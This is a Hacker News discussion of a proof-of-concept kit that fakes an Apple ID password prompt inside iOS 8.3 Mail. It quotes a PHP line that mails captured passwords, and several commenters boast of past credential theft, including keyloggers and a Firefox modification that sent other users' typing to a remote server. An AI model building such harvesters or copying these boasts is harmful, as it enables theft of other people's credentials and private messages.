
iOS 8.3 Mail.app inject kit - diafygi
https://github.com/jansoucek/iOS-Mail.app-inject-kit/tree/master
======
thomasfoster96
I've always been a little worried when using iOS8 because the popup to input
usernames/passwords/passcodes looked very poorly designed by Apple's standards
- there's an odd border around some very square text inputs, and the
placeholder text is misaligned and not capitalised properly.

If I were more paranoid about the security of my phone I probably wouldn't
have used these inputs because they seem a lot like a phishing attack - but I
risked it an assumed it's just a bug or lazy reviewer at Apple.

~~~
kalleboo
I've also always been worried about that dialog since it pops up at the most
random times, when some background iCloud connection fails or whatever and it
guesses that it's an authentication issue rather than a network one. I've seen
it show up on the homescreen, Safari, etc. I'm sure users are way too
desensitized to those dialogs now.

They should at the very least bounce you to Settings.app instead of showing
the dialog inside whatever app you're using.

~~~
joshstrange
This 10000X over! I try to never enter my password into those prompts unless I
know what caused it to pop. Apple has failed MASSIVELY buy popping it all the
time for any number of things. They need to explain better WHY they need it
again because everytime I see it I know it could be a fake one or one being
used to just harvest my PW instead of log me into anything.

------
elwell
Oh, this stuff is fun. In high school, I made a WScript that prompted user
"Network timed out on line #6. Please re-enter password:" and would
surreptitiously record it. I put this on a floppy, popped it in when someone
in the library went to the printer, waited, came back and said, "sorry forgot
my floppy; can i get it, excuse me". Didn't use it maliciously; usually would
just modify the folder settings on their home drive on the network to have
repeating images of Pokemon as a background image. I suppose this all sounds
quite devious in writing.

~~~
pavlov
I also made a password logger in high school (like presumably a great many
bored kids). The network was all DOS machines where you used a command line
tool to manually log in to a Novell server. There was no security in that
system, so I wrote a simple wrapper that looked like the Novell login tool,
saved the passwords and then shelled out to the real thing to provide access.

I didn't use the passwords for anything... But there was a guy in another
class whose password was the name of the girl on whom I had a crush too.
Illicit knowledge bred jealousy! Neither of us ever got the girl.

~~~
gauravphoenix
Are you me?

I did the very same thing ~20 years ago. I used a DOS Terminate and Stay
Resident (TSR) code to achieve this, I did't have to fake any screen. The key
strokes were stored in a file.

I still remember keyboard interrupt value (0x9) while registering TSR code.

~~~
PiRX
Was it with Novel network? 'cuz I remember their login being paranoid and
starting to emit beeps with TSR hooked on keyboard interrupt. Or maybe it was
just a sloppy coding from 12 years old me :)

------
diafygi
The demo video is pretty convincing.

[https://youtube.com/watch?v=9wiMG-oqKf0](https://youtube.com/watch?v=9wiMG-
oqKf0)

~~~
Ciantic
Yes, this is pretty bad for Apple, I wonder if they find a way to extort this
poor man to remove it.

I also liked the fact YouTube started to play "New iOS 8 Mail App: Here's Why
It Is Impressive!" video automatically after that video.

~~~
caryhartline
Apple and other companies have had plenty worse vulnerabilities for their
operating systems exposed and there is not any evidence that extortion took
place afterwards for someone to go quiet.

------
pasta_2
Did this guy e-mail Apple product security?

[https://www.apple.com/support/security/](https://www.apple.com/support/security/)

~~~
kranner
Apparently filed a Radar report on Jan 15, 2015.

~~~
TsukasaUjiie
And every time it's tested:

"mail('product-security@apple.com','Apple ID Password',"Thanks for your
password! \n $data ¯\\_(ツ)_/¯ \n [https://github.com/jansoucek/iOS-Mail.app-
inject-kit");"](https://github.com/jansoucek/iOS-Mail.app-inject-kit"\);")

[1]: [https://github.com/jansoucek/iOS-Mail.app-inject-
kit/blob/ma...](https://github.com/jansoucek/iOS-Mail.app-inject-
kit/blob/master/framework.php#L11)

~~~
imrehg
Smart and cheeky at the same time, like it!

------
nodesocket
Wouldn't one fix be for native modals (not created by web) to have a
distinguishing feature? For example, native modal backgrounds could uses your
home screen background with a reduced opacity and blur. This could mitigate
these types of phishing attacks since emulating the look and feel in web
(html/css) would be difficult.

~~~
wingerlang
There's a thing in scam popups and emails - they are left not-perfect so that
they can weed out the easier targets. I'm not sure if it is 100% applicable on
this situation, but maybe there's something to it.

------
yAnonymous
"We care about security - but only when there's a public exploit." \- Apple

------
darkhorn
In university's computer labs I have modified Firefox. It injected JavaScript
at the header. This JS was sending everything typed in Firefox to my server.
It was nice to read other people's conversatoins (only the one side of
course). Normally most computers' BIOS was password protected. These ones were
left without BIOS protection, so I was able to run Linux from a USB drive and
modify Program Files folder in C:\

------
Geee
I think a good idea would be to include a personal image to the popups, for
example the user's profile image.

------
comex
Interesting bug, but I'd call the title a bit of an exaggeration. The mail app
doesn't 'allow' harvesting Apple IDs, it allows unexpected content to be
displayed in emails, and the author shows a proof of concept of using that for
relatively convincing phishing.

~~~
anilgulecha
You may not fall for this -- but a good section of non-technical people would.
Harvesting is not an exaggeration.

~~~
comex
A good section of non-technical people would fall for the same thing if
presented from any random website in Safari (especially with iOS's
predilection towards random password popups from background processes...). Not
trying to downplay the issue, just provide some perspective.

~~~
JohnTHaller
One big difference is that by tying it to the email client, you're already
showing the targets email address pre-filled, just like the legit prompt
would. Plus, you can specifically target an individual and show the prompt
without needing to convince them to visit a webpage first.

------
baidoct
Well, lucky me, I don't use Mail App. I'm using the GMail App

------
skrowl
Apple security really is the laughing stock of the info security world these
days.

First the SMS of doom that could crash any iOS or Mac device, now this.
Seriously though, thanks for the fappening!

~~~
caryhartline
If all you need are those two vulnerabilities to be a laughing stock of the
security world then would not every operating system and major piece of
software fit that bill?

